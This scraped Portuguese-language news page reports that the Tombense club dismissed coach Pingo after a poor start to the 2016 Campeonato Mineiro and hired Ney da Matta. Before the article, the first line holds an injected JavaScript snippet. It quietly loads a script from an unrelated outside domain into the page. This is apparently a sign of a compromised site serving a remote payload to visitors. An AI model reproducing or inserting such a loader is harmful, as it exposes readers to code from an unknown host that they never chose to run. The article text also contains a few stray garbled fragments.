;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Pingo é demitido do Tombense após início ruim no Campeonato Mineiro. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Pingo é demitido do Tombense após início ruim no Campeonato Mineiro.

tbPingo não é mais técnico do Tombense. O treinador não resistiu aos resultados negativos da equipe no Campeonato Mineiro e deixa o comando técnico da equipe após quatro jogos. À frente do Tombense, Pingo teve um empate e três derrotas, duas delas em casa. No último sábado, o time foi derrotado pelo Tupi-MG em casa.
Segundo Pingo, a decisão foi feita em comum acordo com a diretoria e ele entendeu a necessidade da troca.
Tombense age rápido e já apresentou o novo Técnico , Ney da Mata assume o time para o restante do Mineiro 2016.
O Tombense agiu rápido após a demissão de Pingo e já tem um substituto para a tb1sequência do Campeonato Mineiro. O clube acertou a contratação do treinador Ney da Matta, até o fim do estadual. O treinador começa a trabalhar já nesta segunda-feira e já comanda o time diante do Tricordiano na próxima quarta sua ex-equipe, às 19h30, no Almeidão.

O Tombense é lanterna da competição com apenas um ponto conquistado em quatro jogos no Mineiro. O confronto de quarta será válido pela terceira rodada.
Fonte :globoesportezonadamat.com

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.